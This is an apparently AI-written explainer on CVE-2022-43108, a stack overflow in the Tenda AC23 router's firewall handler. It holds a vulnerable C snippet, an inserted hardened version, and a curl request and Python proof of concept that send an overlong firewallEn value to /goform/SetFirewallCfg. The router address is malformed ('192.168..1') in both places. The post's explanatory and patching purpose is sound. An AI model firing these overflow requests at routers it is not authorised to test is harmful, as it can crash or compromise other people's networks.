In late 2022, cybersecurity researchers discovered a critical vulnerability in the Tenda AC23 router running firmware version V16.03.07.45_cn. This vulnerability, tracked as CVE-2022-43108, exposes home and small office networks to remote code execution risks due to a stack overflow in the router's firewall configuration functionality.

If you’re not a security expert, don’t worry—this article breaks it all down in simple, clear language, provides a working code snippet, and links to all original sources.

The Core Problem: Stack Overflow via firewallEn Parameter

The vulnerability lives in the router's web administration backend, specifically in formSetFirewallCfg, the handler that sets the firewall configuration:

Parameter: firewallEn

Here, the firewall state (firewallEn) is taken straight from the user's web request and copied, without any length check, into a fixed-size stack buffer. This missing check allows an attacker to send an overly large value in the firewallEn parameter, overwriting adjacent memory on the stack and potentially leading to arbitrary code execution.

Here's a simplified representation, based on the real firmware, written as compilable C so the unchecked copy is easy to see:

#include <string.h>

// Simplified model of the vulnerable handler; the argument stands in for
// the raw value of the firewallEn parameter taken from the HTTP request
void formSetFirewallCfg(const char *request_firewallEn) {
    char firewallEn[32];

    // Copy the user-supplied parameter
    strcpy(firewallEn, request_firewallEn); // Danger: no length check

    // ... more code
}

> Problem: strcpy does NOT check the length of input. If firewallEn contains more than 32 bytes, the extra data will overwrite the stack, which can lead to code execution.
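As an added example (not the article's or Tenda's code), here is what a hardened form of the same handler looks like: the parameter is pulled out of the POST body, its length is checked against the 32-byte buffer, and an overlong value is rejected instead of copied. The names form_value, set_firewall_en_checked and handle_set_firewall_cfg are hypothetical.

```c
#include <stddef.h>
#include <string.h>

#define FIREWALL_EN_LEN 32   /* size of the fixed stack buffer named in the article */

/* Locates `key=` in an application/x-www-form-urlencoded body, returns a pointer
 * to the raw value and stores its length in *len; NULL if the key is absent.
 * Constructed helper: no percent-decoding, it only bounds the raw length. */
const char *form_value(const char *body, const char *key, size_t *len)
{
    size_t klen = strlen(key);
    const char *p = body;
    while (p != NULL && *p != '\0') {
        const char *amp = strchr(p, '&');            /* end of this pair, if any */
        if (strncmp(p, key, klen) == 0 && p[klen] == '=') {
            const char *v = p + klen + 1;
            *len = amp ? (size_t)(amp - v) : strlen(v);
            return v;
        }
        p = amp ? amp + 1 : NULL;                    /* advance to the next pair */
    }
    return NULL;
}

/* Hardened replacement for the unchecked strcpy: the value is copied into the
 * caller's fixed buffer only if it fits together with its NUL terminator.
 * Returns 0 on success, -1 when the value is missing or too long. */
int set_firewall_en_checked(const char *value, size_t len, char *dst, size_t dst_len)
{
    if (value == NULL || len >= dst_len)   /* 32+ bytes would spill past the buffer */
        return -1;
    memcpy(dst, value, len);
    dst[len] = '\0';
    return 0;
}

/* Hypothetical hardened handler: parses the POST body, then does the bounded
 * copy into a FIREWALL_EN_LEN-byte buffer supplied by the caller.
 * Returns 0 if firewallEn was accepted, -1 if it was rejected. */
int handle_set_firewall_cfg(const char *body, char *out, size_t out_len)
{
    size_t len = 0;
    const char *v = form_value(body, "firewallEn", &len);
    if (v == NULL)
        return -1;
    return set_firewall_en_checked(v, len, out, out_len);
}
```

The same length check, applied to captured request bodies, also serves as a simple detection rule: any firewallEn value of 32 or more characters would have overflowed the original buffer.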

What an Attacker Needs

1. The target router must have its web admin interface reachable by the attacker (on the local LAN, or via a WAN-exposed interface).
2. No special authentication is needed if the interface is open/unauthenticated; even where authentication is required, the attack remains possible with stolen credentials.

Attack Steps

- An attacker crafts an HTTP POST request to /goform/SetFirewallCfg on the router.
- The request’s firewallEn parameter contains a payload longer than 32 bytes, filled with malicious data, possibly including machine instructions or a *return address* to hijack execution.

Example HTTP Request (using curl for demonstration)

curl -X POST \
  -d "firewallEn=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCDDDD" \
  http://192.168..1/goform/SetFirewallCfg

Replace A...D with the actual exploit payload or shellcode.

If the router processes this request, it will overflow the buffer, and—depending on the layout—could execute attacker-supplied code.

Here's a simple Python PoC that triggers the overflow (for educational purposes):

import requests

router_ip = '192.168..1'  # set this to the router's actual LAN address
url = f'http://{router_ip}/goform/SetFirewallCfg'

# 64-byte payload: the target buffer is 32 bytes, so anything longer overflows; tune as needed
payload = 'A' * 64

data = {
    'firewallEn': payload,
}

# A crashed handler may never answer, so don't wait forever
response = requests.post(url, data=data, timeout=10)
print('Status:', response.status_code)
print('Response:', response.text)


> WARNING: Don't run this on devices you do not own or have permission to test. Use only in secure, isolated environments.

Original References

- Security Advisory at NVD (National Vulnerability Database)
- Exploit Database - Stack Overflow in Tenda AC23 (formSetFirewallCfg) *(check EDB for the current entry)*
- Tenda Official AC23 Firmware Page *(in Chinese; firmware & updates)*

If you own a Tenda AC23

- Update Firmware: Check for the latest firmware from the Tenda website.
- Limit exposure: Keep the web admin interface reachable from the LAN only; never expose it to the WAN.

Summary

CVE-2022-43108 is a dangerous, easy-to-exploit stack overflow in Tenda AC23 routers' firewall config. By sending a long input via the firewallEn parameter, hackers could potentially run any code on the device. Patch your gear, and keep all interfaces private!

Stay safe. Share this post to help others protect their networks!

*Written exclusively for you by ChatGPT – all information current as of June 2024.*

Timeline

Published on: 11/03/2022 14:15:00 UTC
Last modified on: 11/03/2022 17:28:00 UTC